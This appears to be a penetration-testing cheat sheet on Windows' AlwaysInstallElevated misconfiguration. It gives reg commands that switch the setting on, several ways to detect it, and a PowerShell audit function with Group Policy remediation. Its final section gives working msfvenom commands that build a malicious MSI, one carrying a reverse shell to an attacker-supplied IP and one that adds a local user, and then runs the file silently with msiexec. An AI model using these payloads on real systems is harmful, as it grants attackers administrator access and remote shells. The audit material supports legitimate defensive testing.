
AlwaysInstallElevated

Windows Installer files [.msi] are used to install applications on the system. They usually run with the privilege level of the user that starts them.

However, Windows Installer can be configured to run every install with elevated privileges from any user account, even unprivileged ones. We can then potentially generate a malicious [.msi] file that would run with admin privileges.


Setting the Values

Required Privileges: Administrators

If the values are already set, the user doesn't require administrative privileges.

:: Set AlwaysInstallElevated for the machine and for the current user
:: (/f overwrites an existing value without prompting)
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f

:: Set AlwaysInstallElevated for a specific user
:: Requires that user's SID
:: The user SID can be found with [whoami /all] when run as that user
reg add HKEY_USERS\<USER_SID>\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f

Finding the Values

Both values must be set to [0x1] (in both HKLM and HKCU); otherwise exploitation is not possible.

:: Find the values using [WinPEAS]
winpeas quiet systeminfo

:: Find the values using [Metasploit]
exploit/windows/local/always_install_elevated

:: [CMD] Find the values using [reg]
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# [PSH] Find the values using [Get-ItemProperty]
# (PowerShell needs the provider drive prefix HKLM:\ and HKCU:\, not the bare hive name)
Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer

# [PSH] Find the values using [PowerUp]
# (Get-RegistryAlwaysInstallElevated checks the keys; Write-UserAddMSI builds the MSI that adds a local user)
Get-RegistryAlwaysInstallElevated
Write-UserAddMSI
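The following is an added PowerShell audit function, not part of the original page or of PowerUp: it reads the same two registry values as the [reg] and [Get-ItemProperty] checks above, treats a missing key as "not set", and reports whether the combination is exploitable together with the matching Group Policy remediation. The function name is assumed.

```powershell
# Added example (not from the original page): audit the AlwaysInstallElevated
# misconfiguration. Windows Installer only elevates when BOTH the machine (HKLM)
# and user (HKCU) values are 1; any other combination is not exploitable.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param()

    # Provider paths (HKLM:\ / HKCU:\) are required; the bare hive name fails in PowerShell.
    $paths = [ordered]@{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }

    $values = [ordered]@{}
    foreach ($scope in $paths.Keys) {
        # A missing key or value is equivalent to 0 (disabled), so swallow the error.
        $item = Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($null -ne $item) {
            $values[$scope] = [int]$item.AlwaysInstallElevated
        } else {
            $values[$scope] = 0
        }
    }

    # Exploitable only when both values are exactly 1 (the page's "0x1" in both hives).
    $exploitable = ($values.Machine -eq 1) -and ($values.User -eq 1)

    $remediation = if ($exploitable) {
        'Disable "Always install with elevated privileges" under both Computer Configuration ' +
        'and User Configuration > Administrative Templates > Windows Components > Windows Installer ' +
        '(or set both registry values to 0)'
    } else {
        'None required'
    }

    [pscustomobject]@{
        MachineValue = $values.Machine
        UserValue    = $values.User
        Exploitable  = $exploitable
        Remediation  = $remediation
    }
}

# Usage: run on the host being audited; Exploitable = True is the finding.
Test-AlwaysInstallElevated | Format-List
```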

Creating and Running the Malicious [MSI]

:: PAYLOADS
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o Malicious.msi
msfvenom -p windows/adduser USER=username PASS=password -f msi -o Malicious.msi

:: Run the MSI
msiexec /quiet /qn /i C:\Payload\Path\Malicious.msi